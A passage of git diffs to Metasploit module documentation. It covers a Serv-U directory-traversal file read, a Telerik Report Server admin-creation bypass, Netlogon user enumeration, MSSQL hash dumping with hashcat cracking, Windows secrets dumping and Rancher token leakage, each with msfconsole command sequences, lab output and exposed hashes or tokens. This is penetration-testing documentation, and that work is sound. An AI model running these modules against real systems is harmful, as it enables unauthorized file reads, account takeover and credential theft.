+[+] Found leaked key Cluster.Status.ServiceAccountToken: eyJhbGciOiJSUzI1NiIsImtpZCI6IndsUHhqR1pxX1dSbkFwVG92SFZ1RWV5WDNjbktDTmhZRVUtOFhWY2gyQ0kifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4taG52eG4iLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjgyOWZiN2FiLTA0NzItNDA1ZC1iOWI4LTRmNjhjYmZhNDAyMyIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.URiTKnslommru1NDTq-ClcSc9DBsQwr4_eqSCfksoIeGACwYKK3kPCxe0aVixOkWK9saFTcR46bEz7Of4BfMjUShBl89zSmaGHmlNvYd2sLssWMXbcQInC4Y7Ckti49VbBFoU5EWe-LBSiNrhZcNL6NTn00PgMlIT7OFiSugg8ar7k6Q1Suak0pW_ea1Z56bHGWD-WJM8GsYxohXX7HwYh8cyfOSd_jH6HTZ-p6qsZcWAHnREuzNwcdXqycDVxTA48XEZlfLOJDgvbyhNPssedf3os1rcWTQ5vh_NzUjyqpb8PzQOWm427XjMzBQxwSJVyu1a2TYlNXsLX9qCARjng
+[*] Querying /v1/management.cattle.io.clustertemplates
+[*] Querying /v1/management.cattle.io.notifiers
+[*] Querying /v1/project.cattle.io.sourcecodeproviderconfig
+[-] No response received from /v1/project.cattle.io.sourcecodeproviderconfig
+[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/catalogs
+[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/clusters
+[-] No response received from /k8s/clusters/local/apis/management.cattle.io/v3/clusters
+[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/clustertemplates
+[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/notifiers
+[*] Querying /k8s/clusters/local/apis/project.cattle.io/v3/sourcecodeproviderconfigs
+[*] Auxiliary module execution completed
+```
+
+The [Cluster.Status.ServiceAccountToken](https://jwt.io/#debugger-io?token=eyJhbGciOiJSUzI1NiIsImtpZCI6IndsUHhqR1pxX1dSbkFwVG92SFZ1RWV5WDNjbktDTmhZRVUtOFhWY2gyQ0kifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4taG52eG4iLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjgyOWZiN2FiLTA0NzItNDA1ZC1iOWI4LTRmNjhjYmZhNDAyMyIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.URiTKnslommru1NDTq-ClcSc9DBsQwr4_eqSCfksoIeGACwYKK3kPCxe0aVixOkWK9saFTcR46bEz7Of4BfMjUShBl89zSmaGHmlNvYd2sLssWMXbcQInC4Y7Ckti49VbBFoU5EWe-LBSiNrhZcNL6NTn00PgMlIT7OFiSugg8ar7k6Q1Suak0pW_ea1Z56bHGWD-WJM8GsYxohXX7HwYh8cyfOSd_jH6HTZ-p6qsZcWAHnREuzNwcdXqycDVxTA48XEZlfLOJDgvbyhNPssedf3os1rcWTQ5vh_NzUjyqpb8PzQOWm427XjMzBQxwSJVyu1a2TYlNXsLX9qCARjng) is actually a JWT token as seen in the link.
@@ -0,0 +1,201 @@
+## Vulnerable Application
+This module exploits an unauthenticated file read vulnerability, due to directory traversal, affecting
+SolarWinds Serv-U FTP Server 15.4, Serv-U Gateway 15.4, and Serv-U MFT Server 15.4. All versions prior to
+the vendor supplied hotfix "15.4.2 Hotfix 2" (version 15.4.2.157) are affected.
+
+For a technical analysis of the vulnerability, read our [Rapid7 Analysis](https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis).
+
+## Testing
+Follow the below instruction for either Linux or Windows.
+* Download a vulnerable version of SolarWinds Serv-U MFT Server, for example version `15.4.2.126`.
+* Install the Serv-U Server by running the installer binary and accepting the defaults for every setting.
+* Log into the Serv-U Server Management Console, and create a new Serv-U Domain. Follow the instruction and
+accept the default values during setup. The newly created domain will expose a HTTP and HTTPS service bound to all
+interfaces. These are the `RHOST`, `RPORT`, and `SSL` options we set in the auxiliary module.
+
+To read a file we set the `TARGETFILE` option to the absolute path of the file we want to read. For example on Linux
+we can set the target file to `/etc/passwd`, or on Windows to `C:\\Windows\win.ini`.
+
+Note: When using `msfconsole` you will need to escape a backslash (`\ `) with a double backslash (`\\`).
+
+On Windows, by default, the install directory is `C:\ProgramData\RhinoSoft\Serv-U\ ` and the `Serv-U.exe` service runs
+as the `NT AUTHORITY\NETWORK SERVICE` user.
+
+On Linux, by default, the install directory is `/usr/local/Serv-U/` and the `Serv-U` service runs as `root`.
+The file `/usr/local/Serv-U/Shares/Serv-U.FileShares` is a SQLite database containing the absolute path of all files
+shared by Serv-U, and can be downloaded and used for target file discovery. This database file is not accessible on a
+Windows target, as it is locked by the `Serv-U.exe` process and cannot be opened a second time.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set STORE_LOOT false`
+5. `set TARGETFILE /etc/passwd`
+6. `check`
+7. `run`
+
+## Options
+
+### STORE_LOOT
+Whether the read file's contents should be stored as loot in the Metasploit database. If set to false, the files
+content will be displayed in the console. (default: true).
+
+### TARGETURI
+The base URI path to the web application (default: /).
+
+### TARGETFILE
+The absolute path of a target file to read (default: /etc/passwd).
+
+### PATH_TRAVERSAL_COUNT
+The number of double dot (..) path segments needed to traverse to the root folder. For a default install of Serv-U
+on both Linux and Windows, the value for this is 4. (default: 4).
+
+## Scenarios
+
+### A vulnerable Linux target
+
+```
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set RHOST 192.168.86.43
+RHOST => 192.168.86.43
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set RPORT 443
+RPORT => 443
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set STORE_LOOT false
+STORE_LOOT => false
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set TARGETFILE /etc/passwd
+TARGETFILE => /etc/passwd
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > show options
+
+Module options (auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995):
+
+   Name                  Current Setting  Required  Description
+   ----                  ---------------  --------  -----------
+   PATH_TRAVERSAL_COUNT  4                yes       The number of double dot (..) path segments needed to traverse to the root folder.
+   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                192.168.86.43    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT                 443              yes       The target port (TCP)
+   SSL                   true             no        Negotiate SSL/TLS for outgoing connections
+   STORE_LOOT            false            no        Store the target file as loot
+   TARGETFILE            /etc/passwd      yes       The full path of a target file to read.
+   TARGETURI             /                yes       The base URI path to the web application
+   VHOST                                  no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > check
+[+] 192.168.86.43:443 - The target is vulnerable. SolarWinds Serv-U version 15.4.2.126 (Linux 64-bit; Version: 6.5.0-15-generic)
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > run
+[*] Running module against 192.168.86.43
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. SolarWinds Serv-U version 15.4.2.126 (Linux 64-bit; Version: 6.5.0-15-generic)
+[*] Reading file /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:102:105::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+syslog:x:104:111::/home/syslog:/usr/sbin/nologin
+_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
+uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin
+systemd-oom:x:108:116:systemd Userspace OOM Killer,,,:/run/systemd:/usr/sbin/nologin
+tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin
+avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
+kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+avahi:x:114:121:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
+cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
+rtkit:x:116:123:RealtimeKit,,,:/proc:/usr/sbin/nologin
+whoopsie:x:117:124::/nonexistent:/bin/false
+sssd:x:118:125:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
+speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
+nm-openvpn:x:120:126:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
+saned:x:121:128::/var/lib/saned:/usr/sbin/nologin
+colord:x:122:129:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+geoclue:x:123:130::/var/lib/geoclue:/usr/sbin/nologin
+pulse:x:124:131:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
+hplip:x:126:7:HPLIP system user,,,:/run/hplip:/bin/false
+gdm:x:127:133:Gnome Display Manager:/var/lib/gdm3:/bin/false
+mysql:x:128:136:MySQL Server,,,:/nonexistent:/bin/false
+fwupd-refresh:x:129:137:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
+xrdp:x:130:138::/run/xrdp:/usr/sbin/nologin
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > 
+```
+
+### A vulnerable Windows target
+
+```
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set RHOST 192.168.86.68
+RHOST => 192.168.86.68
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set RPORT 80
+RPORT => 80
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set SSL false
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => false
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > set TARGETFILE c:\\\\Windows\\win.ini
+TARGETFILE => c:\\Windows\win.ini
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > show options 
+
+Module options (auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995):
+
+   Name                  Current Setting      Required  Description
+   ----                  ---------------      --------  -----------
+   PATH_TRAVERSAL_COUNT  4                    yes       The number of double dot (..) path segments needed to traverse to the root folder.
+   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                192.168.86.68        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT                 80                   yes       The target port (TCP)
+   SSL                   false                no        Negotiate SSL/TLS for outgoing connections
+   STORE_LOOT            false                no        Store the target file as loot
+   TARGETFILE            c:\\Windows\win.ini  yes       The full path of a target file to read.
+   TARGETURI             /                    yes       The base URI path to the web application
+   VHOST                                      no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > check
+[+] 192.168.86.68:80 - The target is vulnerable. SolarWinds Serv-U version 15.4.2.126 (Windows Server 2012 64-bit; Version: 6.2.9200)
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) > run
+[*] Running module against 192.168.86.68
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. SolarWinds Serv-U version 15.4.2.126 (Windows Server 2012 64-bit; Version: 6.2.9200)
+[*] Reading file c:\\Windows\win.ini
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/solarwinds_servu_fileread_cve_2024_28995) >
+```
@@ -39,14 +39,15 @@ If you already have the LDAP base DN, you may set it in this option.
 msf5 > use auxiliary/gather/vmware_vcenter_vmdir_ldap
 msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > options

-Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
-
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   BASE_DN                   no        LDAP base DN if you already have it
-   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT    636              yes       The target port
-   SSL      true             no        Enable SSL on the LDAP connection
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   BASE_DN                    no        LDAP base DN if you already have it
+   DOMAIN                     no        The domain to authenticate to
+   PASSWORD                   no        The password to authenticate with
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     636              yes       The target port
+   SSL       true             no        Enable SSL on the LDAP connection
+   USERNAME                   no        The username to authenticate with


 Auxiliary action:
@@ -2,10 +2,15 @@
 ### Description
 The `windows_secrets_dump` auxiliary module dumps SAM hashes and LSA secrets
 (including cached creds) from the remote Windows target without executing any
-agent locally. First, it reads as much data as possible from the registry and
-then save the hives locally on the target (`%SYSTEMROOT%\\random.tmp`).
-Finally, it downloads the temporary hive files and reads the rest of the data
-from it. These temporary files are removed when it's done.
+agent locally. This is done by remotely updating the registry key security
+descriptor, taking advantage of the WriteDACL privileges held by local
+administrators to set temporary read permissions.
+
+This can be disabled by setting the `INLINE` option to false and the module
+will fallback to the original implementation, which consists in saving the
+registry hives locally on the target (%SYSTEMROOT%\Temp\<random>.tmp),
+downloading the temporary hive files and reading the data from it. This
+temporary files are removed when it's done.

 On domain controllers, secrets from Active Directory is extracted using [MS-DRDS]
 DRSGetNCChanges(), replicating the attributes we need to get SIDs, NTLM hashes,
@@ -43,7 +48,10 @@ Windows XP/Server 2003 to Windows 10/Server version 2004.
 14. Verify the notes are there

 ## Options
-Apart from the standard SMB options, no other specific options are needed.
+
+### INLINE
+Use inline technique to read protected keys from the registry remotely without
+saving the hives to disk (default: true).

 ## Actions

@@ -64,7 +64,7 @@ Basic options:
 Description:
  This module dependent on the given filename extension creates either 
  a .lnk, .scf, .url, desktop.ini file which includes a reference to 
-  the the specified remote host, causing SMB connections to be 
+  the specified remote host, causing SMB connections to be 
  initiated from any user that views the file.

 References:
@@ -0,0 +1,79 @@
+## Vulnerable Application
+
+A new method for gathering domain users. The method leverages auth-level = 1 (No authentication) against the
+MS-NRPC (Netlogon) interface on domain controllers. All that's required is the domain controller's IP address,
+and the entire process can be completed without providing any credentials.
+
+## Verification Steps
+
+1. Do: `use auxiliary/gather/nrpc_enumusers`
+2. Do: `set RHOSTS <targer IP addresses>`
+3. Do: `set USER_FILE <path to your users list>`
+4. Do: `run`
+
+
+## Target
+
+To use nrpc_enumusers, make sure you are able to connect to the Domain Controller.
+It has been tested with Windows servers 2012, 2016, 2019 and 2022
+
+## Options
+
+### USER_FILE
+
+**Description:** Path to the file containing the list of usernames to enumerate. Each username should be on a separate line.
+
+**Usage:** Provide the path to the file that contains the list of user accounts you want to test.
+
+**Example:** `set USER_FILE /path/to/usernames.txt`
+
+2- `RHOSTS` (required)
+
+**Description:** The target IP address or range of IP addresses of the Domain Controllers.
+
+**Usage:** Specify the IP address or addresses of the Domain Controllers you are targeting.
+
+**Example:** `set RHOSTS 192.168.1.100`
+
+3- `RPORT` (optional)
+
+**Description:** The port for the MS-NRPC interface. If not specified, the module will attempt to determine the endpoint.
+
+**Usage:** If you know the port used by the MS-NRPC interface, you can specify it. Otherwise, the module will find it automatically.
+
+**Example:** `set RPORT 49664`
+
+## Scenarios
+
+The following demonstrates basic usage, using a custom wordlist,
+targeting a single Domain Controller to identify valid domain user accounts.
+
+Create a new `./users.txt` file, then run the module:
+
+```
+msf6 auxiliary(gather/nrpc_enumusers) > set RHOSTS 192.168.177.177
+RHOSTS => 192.168.177.177
+msf6 auxiliary(gather/nrpc_enumusers) > set USER_FILE users.txt 
+USER_FILE => users.txt
+msf6 auxiliary(gather/nrpc_enumusers) > run
+
+[*] 192.168.177.177: - Connecting to the endpoint mapper service...
+[*] 192.168.177.177: - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.177.177[49664]...
+[-] 192.168.177.177: - Tiffany.Molina does not exist
+[-] 192.168.177.177: - SMITH does not exist
+[-] 192.168.177.177: - JOHNSON does not exist
+[-] 192.168.177.177: - WILLIAMS does not exist
+[-] 192.168.177.177: - Administratorsvc_ldap does not exist
+[-] 192.168.177.177: - svc_ldap does not exist
+[-] 192.168.177.177: - ksimpson does not exist
+[+] 192.168.177.177: - Administrator exists
+[-] 192.168.177.177: - James does not exist
+[-] 192.168.177.177: - nikk37 does not exist
+[-] 192.168.177.177: - svc-printer does not exist
+[-] 192.168.177.177: - SABatchJobs does not exist
+[-] 192.168.177.177: - e.black does not exist
+[-] 192.168.177.177: - Kaorz does not exist
+[*] 192.168.177.177: - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/nrpc_enumusers) >
+```
@@ -0,0 +1,53 @@
+## Vulnerable Application
+This module exploits an authentication bypass vulnerability in Telerik Report Server versions 10.0.24.305 and
+prior which allows an unauthenticated attacker to create a new account with administrative privileges. The
+vulnerability leverages the initial setup page which is still accessible once the setup process has completed.
+
+If either USERNAME or PASSWORD are not specified, then a random value will be selected. The module will fail if
+the specified USERNAME already exists.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/telerik_report_server_auth_bypass`
+1. Set the `RHOSTS` option
+1. Do: `run`
+
+## Options
+
+### USERNAME
+Username for the new account. A random value will be used unless specified.
+
+### PASSWORD
+Password for the new account. A random value will be used unless specified.
+
+## Scenarios
+
+### Telerik Report Server 8.0.22.225 on Windows Server 2022
+
+```
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) > set RHOSTS 192.168.159.27
+RHOSTS => 192.168.159.27
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) > set VERBOSE true
+VERBOSE => true
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) > check
+
+[*] Detected Telerik Report Server version: 8.0.22.225.
+[+] 192.168.159.27:83 - The target is vulnerable. Telerik Report Server 8.0.22.225 is affected.
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) > run
+[*] Running module against 192.168.159.27
+
+[*] Creating a new administrator account using CVE-2024-4358
+[+] Created account: newton_schmeler:CkiaTtppD4eGUvl7
+[*] Auxiliary module execution completed
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) > creds
+Credentials
+===========
+
+host            origin          service        public                private           realm  private_type  JtR Format  cracked_password
+----            ------          -------        ------                -------           -----  ------------  ----------  ----------------
+192.168.159.27  192.168.159.27  83/tcp (http)  newton_schmeler       CkiaTtppD4eGUvl7         Password
+
+metasploit-framework (S:0 J:0) auxiliary(scanner/http/telerik_report_server_auth_bypass) >
+```
@@ -0,0 +1,91 @@
+## Description
+
+The `mssql_hashdump` module queries an MSSQL instance or session and returns hashed user:pass pairs. These pairs can be decripted via or `hashcat`.
+
+## Available Options
+
+```
+msf6 auxiliary(scanner/mssql/mssql_hashdump) > options
+
+Module options (auxiliary/scanner/mssql/mssql_hashdump):
+
+   Name                 Current Setting  Required  Description
+   ----                 ---------------  --------  -----------
+   USE_WINDOWS_AUTHENT  false            yes       Use windows authentication (requires DOMAIN option set)
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   DATABASE  MSSQL            no        The database to authenticate against
+   PASSWORD                   no        The password for the specified username
+   RHOSTS                     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     1433             no        The target port (TCP)
+   THREADS   1                yes       The number of concurrent threads (max one per host)
+   USERNAME  MSSQL            no        The username to authenticate as
+
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+```
+
+## Scenarios
+
+With a session:
+```
+msf6 auxiliary(scanner/mssql/mssql_hashdump) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type   Information                Connection
+  --  ----  ----   -----------                ----------
+  1         mssql  MSSQL sa @ 127.0.0.1:1433  127.0.0.1:52307 -> 127.0.0.1:1433 (127.0.0.1)
+
+msf6 auxiliary(scanner/mssql/mssql_hashdump) > run session=-1
+
+[*] Using existing session 1
+[*] Instance Name: "758549b9f69e"
+[+] Saving mssql12 = sa:0x0200F433830BDBA809805FE53E59E7A1AACF9AC21241881F76B9B95EDC713FD01C8E692705409A5C0F8A46DDB1707A283BA9307D6B3C664BB9F7652758B70262C88F629DBC7E
+[+] Saving mssql12 = ##MS_PolicyEventProcessingLogin##:0x02003F137BFF990AE7D0B89DA15EEDF4B962E200A9AAECE6AC7E4786176A08C4D278C0E9B203795F972CB508FD17827A755AF4284A9891F01C502EEBB5ECFABD7FA6CD3603E2
+[+] Saving mssql12 = ##MS_PolicyTsqlExecutionLogin##:0x0200DA9B84641F740A6423EC34F1B354FB81D9DF53456A7A7A8CCB794B295896C0CD19718C2C9537D3A7E82C41350F1549E2E2B99D819345DCABF1855AF2F83FA6CDC3EF8F96
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/mssql/mssql_hashdump) > run RPORT=1433 RHOSTS=127.0.0.1 USERNAME=sa PASSWORD=yourStrong(!)Password
+
+[*] 127.0.0.1:1433 - Instance Name: "758549b9f69e"
+[+] 127.0.0.1:1433 - Saving mssql12 = sa:0x0200F433830BDBA809805FE53E59E7A1AACF9AC21241881F76B9B95EDC713FD01C8E692705409A5C0F8A46DDB1707A283BA9307D6B3C664BB9F7652758B70262C88F629DBC7E
+[+] 127.0.0.1:1433 - Saving mssql12 = ##MS_PolicyEventProcessingLogin##:0x02003F137BFF990AE7D0B89DA15EEDF4B962E200A9AAECE6AC7E4786176A08C4D278C0E9B203795F972CB508FD17827A755AF4284A9891F01C502EEBB5ECFABD7FA6CD3603E2
+[+] 127.0.0.1:1433 - Saving mssql12 = ##MS_PolicyTsqlExecutionLogin##:0x0200DA9B84641F740A6423EC34F1B354FB81D9DF53456A7A7A8CCB794B295896C0CD19718C2C9537D3A7E82C41350F1549E2E2B99D819345DCABF1855AF2F83FA6CDC3EF8F96
+[*] 127.0.0.1:1433 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Directly querying a machine:
+```
+msf6 auxiliary(scanner/mssql/mssql_hashdump) > run RPORT=1433 RHOSTS=127.0.0.1 USERNAME=sa PASSWORD=yourStrong(!)Password
+
+[*] 127.0.0.1:1433 - Instance Name: "758549b9f69e"
+[+] 127.0.0.1:1433 - Saving mssql12 = sa:0x0200F433830BDBA809805FE53E59E7A1AACF9AC21241881F76B9B95EDC713FD01C8E692705409A5C0F8A46DDB1707A283BA9307D6B3C664BB9F7652758B70262C88F629DBC7E
+[+] 127.0.0.1:1433 - Saving mssql12 = ##MS_PolicyEventProcessingLogin##:0x02003F137BFF990AE7D0B89DA15EEDF4B962E200A9AAECE6AC7E4786176A08C4D278C0E9B203795F972CB508FD17827A755AF4284A9891F01C502EEBB5ECFABD7FA6CD3603E2
+[+] 127.0.0.1:1433 - Saving mssql12 = ##MS_PolicyTsqlExecutionLogin##:0x0200DA9B84641F740A6423EC34F1B354FB81D9DF53456A7A7A8CCB794B295896C0CD19718C2C9537D3A7E82C41350F1549E2E2B99D819345DCABF1855AF2F83FA6CDC3EF8F96
+[*] 127.0.0.1:1433 - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Different MSSQL Versions have different hash formats. For example:
+
+MSSQL (2000): 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
+MSSQL (2005): 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
+MSSQL (2012 and later): 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375
+
+To decrypt:
+Save into a `passwords.txt` file
+Run with hashcat, based on the MSSQL Version:
+`hashcat --force -m 131 ./hashes.txt ./passwords.txt` (MSSQL 2000)
+`hashcat --force -m 132 ./hashes.txt ./passwords.txt` (MSSQL 2005)
+`hashcat --force -m 1731 ./hashes.txt ./passwords.txt` (MSSQL 2012 and later)
@@ -15,6 +15,174 @@ A docker container can be spun up with the following command to test this module

 ## Options

+### CreateSession
+
+When using the `scanner/mssql/mssql_login` module, the CreateSession option can be used to obtain an interactive
+session within the MSSQL instance. Running the following commands with all other options set:
+
+```msf
+msf6 auxiliary(scanner/mssql/mssql_login) > run CreateSession=true RPORT=1433 RHOSTS=192.168.2.242 USERNAME=user PASSWORD=password
+```
+
+Should give you output containing:
+
+```msf
+[*] 192.168.2.242:1433    - 192.168.2.242:1433 - MSSQL - Starting authentication scanner.
+[!] 192.168.2.242:1433    - No active DB -- Credential data will not be saved!
+[+] 192.168.2.242:1433    - 192.168.2.242:1433 - Login Successful: WORKSTATION\user:password
+[*] MSSQL session 1 opened (192.168.2.1:60963 -> 192.168.2.242:1433) at 2024-03-15 13:41:31 -0500
+[*] 192.168.2.242:1433    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Which you can interact with using `sessions -i <session id>` or `sessions -i -1` to interact with the most recently opened session.
+
+```msf
+msf6 auxiliary(scanner/mssql/mssql_login) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type   Information                      Connection
+  --  ----  ----   -----------                      ----------
+  1         mssql  MSSQL test @ 192.168.2.242:1433  192.168.2.1:60963 -> 192.168.2.242:1433 (192.168.2.242)
+
+msf6 auxiliary(scanner/mssql/mssql_login) > sessions -i 1
+[*] Starting interaction with 1...
+
+mssql @ 192.168.2.242:1433 (master) > query 'select @@version;'
+Response
+========
+
+    #  NULL
+    -  ----
+    0  Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
+	    Oct 8 2022 05:58:25
+	    Copyright (C) 2022 Microsoft Corporation
+	    Developer Edition (64-bit) on Windows Server 2022 Stand
+       ard 10.0 <X64> (Build 20348: ) (Hypervisor)
+```
+
+When interacting with a session, the help command can be useful:
+
+```msf
+mssql @ 192.168.2.242:1433 (master) > help
+
+Core Commands
+=============
+
+    Command            Description
+    -------            -----------
